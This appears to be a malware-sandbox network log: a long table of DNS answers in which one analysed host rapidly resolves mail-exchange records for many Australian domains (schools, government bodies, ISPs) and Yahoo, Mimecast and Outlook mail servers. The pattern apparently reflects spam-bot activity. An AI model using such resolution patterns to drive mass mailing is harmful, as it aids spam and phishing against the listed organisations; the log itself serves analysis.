                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.692259073 CET8.8.8.8192.168.2.30xfacbNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.740885973 CET8.8.8.8192.168.2.30x7da8No error (0)mail.aflpa.com.au111.223.235.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.755175114 CET8.8.8.8192.168.2.30x7891No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.755175114 CET8.8.8.8192.168.2.30x7891No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.755175114 CET8.8.8.8192.168.2.30x7891No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.783565044 CET8.8.8.8192.168.2.30x6642No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.873647928 CET8.8.8.8192.168.2.30x409fNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.873647928 CET8.8.8.8192.168.2.30x409fNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.907761097 CET8.8.8.8192.168.2.30x4400No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.988351107 CET8.8.8.8192.168.2.30xc34No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.988351107 CET8.8.8.8192.168.2.30xc34No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:30.988351107 CET8.8.8.8192.168.2.30xc34No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.013597965 CET8.8.8.8192.168.2.30x56afNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.109364986 CET8.8.8.8192.168.2.30xe6d2No error (0)stonedesign.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.109364986 CET8.8.8.8192.168.2.30xe6d2No error (0)stonedesign.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.142630100 CET8.8.8.8192.168.2.30x2e35No error (0)d505367.a.ess.au.barracudanetworks.com3.24.133.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.142630100 CET8.8.8.8192.168.2.30x2e35No error (0)d505367.a.ess.au.barracudanetworks.com3.24.133.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.142630100 CET8.8.8.8192.168.2.30x2e35No error (0)d505367.a.ess.au.barracudanetworks.com3.24.133.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.489460945 CET8.8.8.8192.168.2.30x72d0Name error (3)aqis.gov.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.843573093 CET8.8.8.8192.168.2.30x2f50No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:31.866260052 CET8.8.8.8192.168.2.30xcceeNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:32.000320911 CET8.8.8.8192.168.2.30x6b66No error (0)cardno.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:32.000320911 CET8.8.8.8192.168.2.30x6b66No error (0)cardno.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:32.060441017 CET8.8.8.8192.168.2.30xf27fNo error (0)mxa-0028c002.gslb.pphosted.com208.84.65.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:33.945442915 CET8.8.8.8192.168.2.30xc9c6No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:33.945442915 CET8.8.8.8192.168.2.30xc9c6No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:33.969804049 CET8.8.8.8192.168.2.30x944fNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.095841885 CET8.8.8.8192.168.2.30x56d3No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.114449978 CET8.8.8.8192.168.2.30x4098No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.145282030 CET8.8.8.8192.168.2.30x817dName error (3)colaccollege.vic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.405894995 CET8.8.8.8192.168.2.30x39fName error (3)iird.vic.gov.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.576039076 CET8.8.8.8192.168.2.30x6faeNo error (0)vodafone.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.576039076 CET8.8.8.8192.168.2.30x6faeNo error (0)vodafone.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.580121994 CET8.8.8.8192.168.2.30xffdeName error (3)sttherese.catholic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.595441103 CET8.8.8.8192.168.2.30x97bcNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.595441103 CET8.8.8.8192.168.2.30x97bcNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.595441103 CET8.8.8.8192.168.2.30x97bcNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.595441103 CET8.8.8.8192.168.2.30x97bcNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.642981052 CET8.8.8.8192.168.2.30x6076No error (0)cgs.act.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.674385071 CET8.8.8.8192.168.2.30xabf5No error (0)cgs-act-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.674385071 CET8.8.8.8192.168.2.30xabf5No error (0)cgs-act-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.696950912 CET8.8.8.8192.168.2.30x1b6No error (0)baonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.696950912 CET8.8.8.8192.168.2.30x1b6No error (0)baonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.700884104 CET8.8.8.8192.168.2.30x51fbNo error (0)artmob.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.751328945 CET8.8.8.8192.168.2.30x6beNo error (0)artmob-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.751328945 CET8.8.8.8192.168.2.30x6beNo error (0)artmob-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.768539906 CET8.8.8.8192.168.2.30x86e6No error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.798079967 CET8.8.8.8192.168.2.30xe79aNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:34.798079967 CET8.8.8.8192.168.2.30xe79aNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.014722109 CET8.8.8.8192.168.2.30x51f9No error (0)fortimail02.wide.net.au121.200.0.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.075476885 CET8.8.8.8192.168.2.30x1a03No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.094244957 CET8.8.8.8192.168.2.30xd1dNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.132142067 CET8.8.8.8192.168.2.30x5b45No error (0)csiro.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.132142067 CET8.8.8.8192.168.2.30x5b45No error (0)csiro.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.222999096 CET8.8.8.8192.168.2.30x6f6No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.222999096 CET8.8.8.8192.168.2.30x6f6No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.256972075 CET8.8.8.8192.168.2.30xb5f6No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.322323084 CET8.8.8.8192.168.2.30x5960No error (0)nuk.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.322323084 CET8.8.8.8192.168.2.30x5960No error (0)nuk.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.340773106 CET8.8.8.8192.168.2.30x7117No error (0)us-smtp-inbound-1.mimecast.com205.139.110.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.340773106 CET8.8.8.8192.168.2.30x7117No error (0)us-smtp-inbound-1.mimecast.com207.211.30.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.340773106 CET8.8.8.8192.168.2.30x7117No error (0)us-smtp-inbound-1.mimecast.com205.139.110.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.340773106 CET8.8.8.8192.168.2.30x7117No error (0)us-smtp-inbound-1.mimecast.com207.211.30.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.340773106 CET8.8.8.8192.168.2.30x7117No error (0)us-smtp-inbound-1.mimecast.com205.139.110.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.340773106 CET8.8.8.8192.168.2.30x7117No error (0)us-smtp-inbound-1.mimecast.com207.211.30.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.397870064 CET8.8.8.8192.168.2.30xe2ecNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.419397116 CET8.8.8.8192.168.2.30x56ecNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.419397116 CET8.8.8.8192.168.2.30x56ecNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.448848009 CET8.8.8.8192.168.2.30x1f69No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.448848009 CET8.8.8.8192.168.2.30x1f69No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.448848009 CET8.8.8.8192.168.2.30x1f69No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.476253033 CET8.8.8.8192.168.2.30xc9b7No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.477714062 CET8.8.8.8192.168.2.30xa673No error (0)act-mx.csiro.au150.229.7.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.513870955 CET8.8.8.8192.168.2.30x96beNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.513870955 CET8.8.8.8192.168.2.30x96beNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.513870955 CET8.8.8.8192.168.2.30x96beNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.533418894 CET8.8.8.8192.168.2.30x49a7No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.594531059 CET8.8.8.8192.168.2.30x39f6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.594531059 CET8.8.8.8192.168.2.30x39f6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.594531059 CET8.8.8.8192.168.2.30x39f6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.619101048 CET8.8.8.8192.168.2.30x596cNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.703651905 CET8.8.8.8192.168.2.30x4110No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.703651905 CET8.8.8.8192.168.2.30x4110No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.703651905 CET8.8.8.8192.168.2.30x4110No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.820522070 CET8.8.8.8192.168.2.30xe6f8No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.824188948 CET8.8.8.8192.168.2.30x8afaNo error (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:35.846394062 CET8.8.8.8192.168.2.30x5c7aNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.026717901 CET8.8.8.8192.168.2.30xd9c1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.026717901 CET8.8.8.8192.168.2.30xd9c1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.026717901 CET8.8.8.8192.168.2.30xd9c1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.047648907 CET8.8.8.8192.168.2.30x1205No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.159193039 CET8.8.8.8192.168.2.30x1633No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.159193039 CET8.8.8.8192.168.2.30x1633No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.159193039 CET8.8.8.8192.168.2.30x1633No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.159193039 CET8.8.8.8192.168.2.30x1633No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.159193039 CET8.8.8.8192.168.2.30x1633No error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.187087059 CET8.8.8.8192.168.2.30xec86No error (0)alt4.aspmx.l.google.com173.194.202.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.191227913 CET8.8.8.8192.168.2.30xb06eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.191227913 CET8.8.8.8192.168.2.30xb06eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.191227913 CET8.8.8.8192.168.2.30xb06eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
